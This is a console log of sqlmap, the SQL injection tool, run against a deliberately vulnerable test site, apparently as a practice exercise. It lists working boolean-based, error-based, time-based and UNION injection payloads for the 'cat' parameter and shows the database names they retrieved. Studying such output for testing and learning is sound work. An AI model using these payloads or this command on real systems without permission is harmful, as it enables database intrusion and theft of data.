C:\sqlmap>sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.11.7#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting @ 21:40:41 /2018-12-04/

[21:40:42] [INFO] testing connection to the target URL
[21:40:42] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS
[21:40:42] [INFO] testing if the target URL content is stable
[21:40:43] [INFO] target URL content is stable
[21:40:43] [INFO] testing if GET parameter 'cat' is dynamic
[21:40:43] [INFO] GET parameter 'cat' appears to be dynamic
[21:40:43] [INFO] heuristic (basic) test shows that GET parameter 'cat' might be
 injectable (possible DBMS: 'MySQL')
[21:40:43] [INFO] heuristic (XSS) test shows that GET parameter 'cat' might be v
ulnerable to cross-site scripting (XSS) attacks
[21:40:43] [INFO] testing for SQL injection on GET parameter 'cat'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
ecific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n] y
[21:40:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:40:49] [WARNING] reflective value(s) found and filtering out
[21:40:49] [INFO] GET parameter 'cat' appears to be 'AND boolean-based blind - W
HERE or HAVING clause' injectable (with --string="sem")
[21:40:49] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[21:40:49] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause
(BIGINT UNSIGNED)'
[21:40:50] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXP)'
[21:40:50] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause
(EXP)'
[21:40:50] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER
 BY or GROUP BY clause (JSON_KEYS)'
[21:40:50] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING claus
e (JSON_KEYS)'
[21:40:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (FLOOR)'
[21:40:50] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE,
HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[21:40:50] [INFO] testing 'MySQL inline queries'
[21:40:50] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:40:50] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............  (done)
[21:40:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:40:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment
)'
[21:40:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[21:40:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment
)'
[21:40:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:40:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:41:53] [INFO] GET parameter 'cat' appears to be 'MySQL >= 5.0.12 AND time-ba
sed blind' injectable
[21:41:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:41:53] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[21:41:53] [INFO] 'ORDER BY' technique appears to be usable. This should reduce
the time needed to find the right number of query columns. Automatically extendi
ng the range for current UNION query injection technique test
[21:41:54] [INFO] target URL appears to have 11 columns in query
[21:41:57] [INFO] target URL appears to be UNION injectable with 11 columns
[21:41:57] [INFO] GET parameter 'cat' is 'Generic UNION query (NULL) - 1 to 20 c
olumns' injectable
GET parameter 'cat' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) re
quests:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7326=7326

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (FLOOR)
    Payload: cat=1 AND (SELECT 2544 FROM(SELECT COUNT(*),CONCAT(0x716b7a7871,(SE
LECT (ELT(2544=2544,1))),0x7176627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA
.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cat=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b7
a7871,0x4c594c7a4c5649766e6a446e73574b6275465162655267795a72764579506a7641765a55
6d744653,0x7176627671),NULL,NULL,NULL,NULL-- IzNK
---
[21:42:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.10, Nginx 1.4.1
back-end DBMS: MySQL >= 5.0
[21:42:25] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[21:42:25] [INFO] fetched data logged to text files under 'C:\Users\Meat Man\.sq
lmap\output\testphp.vulnweb.com'

[*] ending @ 21:42:25 /2018-12-04/